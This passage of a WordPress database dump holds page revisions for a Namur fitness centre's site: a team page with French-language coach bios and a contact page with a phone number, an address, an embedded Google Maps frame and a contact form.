href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:600px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:55:18', '2013-07-03 19:55:18', '', 20, 'http://www.crosstrainingcenter.be/?p=253', 0, 'revision', '', 0),
(255, 1, '2013-07-03 19:56:59', '2013-07-03 19:56:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:56:59', '2013-07-03 19:56:59', '', 20, 'http://www.crosstrainingcenter.be/?p=255', 0, 'revision', '', 0),
(254, 1, '2013-07-03 19:55:48', '2013-07-03 19:55:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:280px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:55:48', '2013-07-03 19:55:48', '', 20, 'http://www.crosstrainingcenter.be/?p=254', 0, 'revision', '', 0),
(258, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 9, 'http://www.crosstrainingcenter.be/?p=258', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(259, 1, '2013-07-03 20:26:03', '2013-07-03 20:26:03', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:26:03', '2013-07-03 20:26:03', '', 9, 'http://www.crosstrainingcenter.be/?p=259', 0, 'revision', '', 0),
(260, 1, '2013-07-03 20:28:57', '2013-07-03 20:28:57', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:28:57', '2013-07-03 20:28:57', '', 9, 'http://www.crosstrainingcenter.be/?p=260', 0, 'revision', '', 0),
(261, 1, '2013-07-03 20:31:53', '2013-07-03 20:31:53', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:31:53', '2013-07-03 20:31:53', '', 9, 'http://www.crosstrainingcenter.be/?p=261', 0, 'revision', '', 0),
(262, 1, '2013-07-03 20:33:29', '2013-07-03 20:33:29', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:33:29', '2013-07-03 20:33:29', '', 9, 'http://www.crosstrainingcenter.be/?p=262', 0, 'revision', '', 0),
(263, 1, '2013-07-03 20:36:24', '2013-07-03 20:36:24', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\n0485 / 92 . 02 . 12\r\n\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:36:24', '2013-07-03 20:36:24', '', 9, 